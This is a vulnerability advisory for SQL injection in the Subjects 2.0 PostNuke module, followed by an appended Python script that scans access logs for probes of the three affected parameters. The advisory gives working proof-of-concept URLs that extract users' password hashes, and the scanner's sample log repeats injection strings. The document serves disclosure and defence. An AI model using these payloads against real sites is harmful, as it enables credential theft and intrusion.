****************************************************************************************************
CRIOLABS - Software: Subjects 2.0 - Type: Postnuke module - Vendor: Postnuke Modules Factory.
****************************************************************************************************

## Software ##

Software: Subjects Postnuke module
Version: 2.0
Platforms: Unix/Win/PHP/MySQL/Postnuke
Web: http://home.postnuke.ru

## Vendor Description ##

The module is designed for structured storage and display of text content, with the possibility of storing content in a file on disk. Probably the best one for converting an existing HTML-based site to PostNuke.

## Vulnerabilities ##

SQL injection in the pageid, subid and catid variables.

## Sql-Injection ##

The variables above are vulnerable to SQL injection attacks. These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.

/index.php?module=subjects&func=listpages&subid=[SQL]
/index.php?module=subjects&func=viewpage&pageid=[SQL]
/index.php?module=subjects&func=listcat&catid=[SQL]

## Proof of Concept ##

URL to retrieve the MD5 password hash of a user. This PoC needs UNION functionality enabled in MySQL to retrieve the hash.

/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*

## History ##

Vendor contacted but no response.

## Solution ##

There is no solution at this time; we recommend removing this module immediately.

## Credits ##

Criolabs staff
http://www.criolabs.net
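Since the advisory offers no patch, the practical defensive step besides removing the module is to find out whether the three vulnerable parameters have already been probed. The following is an added example, not part of the Criolabs advisory and not code from the Subjects module: it scans web server access-log lines (assumed to be in Common Log Format; the sample lines are constructed) and flags any request to module=subjects whose subid, pageid or catid value is not a plain decimal integer. The function names (check_request_url, scan_log) and the log format are my assumptions; the parameter-to-func mapping comes from the advisory.

```python
"""Flag non-integer values in the Subjects module's id parameters in access logs.

Added illustration for the advisory above; assumes Common Log Format lines.
"""
import re
from urllib.parse import parse_qs, urlsplit

# func -> the id parameter it reads, as listed in the advisory.
ID_PARAMS = {"listpages": "subid", "viewpage": "pageid", "listcat": "catid"}

# Common Log Format: client ident user [time] "METHOD /url PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)

# Constructed sample log (not real traffic); one benign Subjects request,
# one unrelated module, and two Subjects requests with non-numeric ids.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2004:10:15:01 +0000] "GET /index.php?module=subjects&func=listcat&catid=3 HTTP/1.0" 200 5120
10.0.0.9 - - [12/Mar/2004:10:15:07 +0000] "GET /index.php?module=news&func=view&sid=1%20or%201=1 HTTP/1.0" 200 812
10.0.0.9 - - [12/Mar/2004:10:16:20 +0000] "GET /index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null/* HTTP/1.0" 200 4096
10.0.0.9 - - [12/Mar/2004:10:16:25 +0000] "GET /index.php?module=subjects&func=viewpage&pageid=12%27 HTTP/1.0" 200 300
"""


def check_request_url(url):
    """Return a reason string if `url` carries a suspicious Subjects id, else None.

    Only the strict form of a numeric id (digits only, after URL decoding) is
    accepted, which is what the module should ever receive for these parameters.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # decodes %20, %27, ...
    if query.get("module", [""])[0] != "subjects":
        return None
    func = query.get("func", [""])[0]
    param = ID_PARAMS.get(func)
    if param is None:
        return None
    values = query.get(param)
    if not values:
        return None
    value = values[0]
    if re.fullmatch(r"\d+", value):
        return None
    return f"{param} is not an integer: {value!r}"


def scan_log(text):
    """Parse each log line and return a list of findings (dicts with ip, ts, url, reason)."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        reason = check_request_url(match.group("url"))
        if reason:
            findings.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "url": match.group("url"),
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'{finding["ts"]} {finding["ip"]} {finding["reason"]}')
```

Run against a real access log by passing its contents to scan_log; requests from the unrelated module (the second sample line) are ignored on purpose so the output stays focused on the three parameters the advisory names. Because parse_qs URL-decodes before the check, encoded variants such as %20 or %27 do not evade it.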